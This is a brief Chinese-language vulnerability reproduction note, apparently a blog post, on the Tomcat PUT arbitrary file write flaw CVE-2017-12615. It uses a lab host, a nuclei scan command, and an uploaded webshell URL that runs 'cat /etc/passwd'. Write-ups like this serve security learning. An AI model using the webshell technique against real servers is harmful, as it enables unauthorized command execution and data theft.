Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)

漏洞描述

CVE-2017-12615 对应的漏洞为任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件 。Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件

影响范围

Apache Tomcat 7.0.0 - 7.0.81

漏洞复现

环境搭建
访问页面
http://10.9.75.198:8080/

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)_第1张图片

漏洞复现
使用nuclei工具直接扫描漏洞
./nuclei -u 10.9.75.198

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)_第2张图片

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)_第3张图片

http://10.9.75.198:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)_第4张图片

Tomcat Arbitrary Write-file Vulnerability through PUT Method (CVE-2017-12615)_第5张图片

你可能感兴趣的:(漏洞复现,tomcat)